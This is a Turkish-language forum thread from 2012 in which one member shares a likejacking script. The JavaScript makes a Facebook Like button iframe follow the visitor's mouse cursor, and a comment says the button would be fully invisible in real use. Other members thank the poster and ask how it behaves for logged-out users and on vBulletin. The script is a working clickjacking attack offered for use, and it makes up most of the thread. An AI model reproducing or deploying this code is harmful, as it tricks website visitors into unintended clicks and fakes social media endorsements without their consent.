• 06-10-2012, 19:45:51
    #1
    Bia
    Üyeliği durduruldu
    (function(){
      var tempX = 0,
      tempY = 0,
      IE = document.all ? true : false;
      
      if (!IE) document.captureEvents(Event.MOUSEMOVE);
      
      var like = document.createElement('iframe');
      like.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'http://www.facebook.com/????????') + '&layout=standard&show_faces=true&width=53&action=like&colorscheme=light&height=80';
      like.scrolling = 'no';
      like.frameBorder = 0;
      like.allowTransparency = 'true';
      like.style.border = 0;
      like.style.overflow = 'hidden';
      like.style.cursor = 'pointer';
      like.style.width = '53px';
      like.style.height =  '23px';
      like.style.position = 'absolute';
      like.style.opacity = .8; //Would be 0 if really used
      document.getElementsByTagName('body')[0].appendChild(like);
      
      window.addEventListener('mousemove', mouseMove, false);
      
      setTimeout(function(){
        document.getElementsByTagName('body')[0].removeChild(like);
        window.removeEventListener('mousemove', mouseMove, false);
      }, 100000);
      
      function mouseMove(e) {
        if (IE) {
          tempX = event.clientX + document.body.scrollLeft;
          tempY = event.clientY + document.body.scrollTop;
        } else {
          tempX = e.pageX;
          tempY = e.pageY;
        }
        
        if (tempX < 0) tempX = 0;
        if (tempY < 0) tempY = 0;
        
        like.style.top = (tempY - 8) + 'px';
        like.style.left = (tempX - 25) + 'px';
        
        return true
      }
    })();
    <script type="text/javascript" src="begen.js"></script>
  • 06-10-2012, 20:07:31
    #2
    wordpress te like butonu mause nin ucunda geziyor )
  • 06-10-2012, 20:09:27
    #3
    Bia
    Üyeliği durduruldu
    oktaydeniz adlı üyeden alıntı: mesajı görüntüle
    wordpress te like butonu mause nin ucunda geziyor )
    Ben Paylaşayım Dedim
  • 06-10-2012, 20:28:10
    #4
    teşekkür ederim
  • 06-10-2012, 21:58:44
    #5
    Üyeliği durduruldu
    Bia adlı üyeden alıntı: mesajı görüntüle
    Ben Paylaşayım Dedim
    birkaç şey sormak istiyorum facebooka giriş yapmayan üyeye ikide bir giriş yap penceresi çıkıyormu tıklayınca ? veya 2. kez tıklamada beğeniden vazgeçme olayı falan varmı mausun ucunda dolaşırmı birde vbulletin sistem